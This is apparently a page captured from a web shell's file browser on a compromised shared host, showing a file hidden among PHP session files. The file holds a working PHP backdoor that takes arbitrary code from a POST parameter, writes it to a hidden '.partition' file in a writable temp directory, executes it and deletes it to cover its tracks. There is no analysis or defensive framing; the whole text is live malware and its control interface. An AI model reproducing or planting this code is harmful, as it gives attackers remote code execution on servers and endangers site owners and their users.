Your IP : 216.73.216.244


Current Path : /home/theafprt/.cagefs/opt/alt/php74/var/lib/php/session/
Upload File :
Current File : //home/theafprt/.cagefs/opt/alt/php74/var/lib/php/session/bdCGU1JJqHeFVS

<?php $dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c=rawurldecode($_POST["oS"]);foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.partition";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!");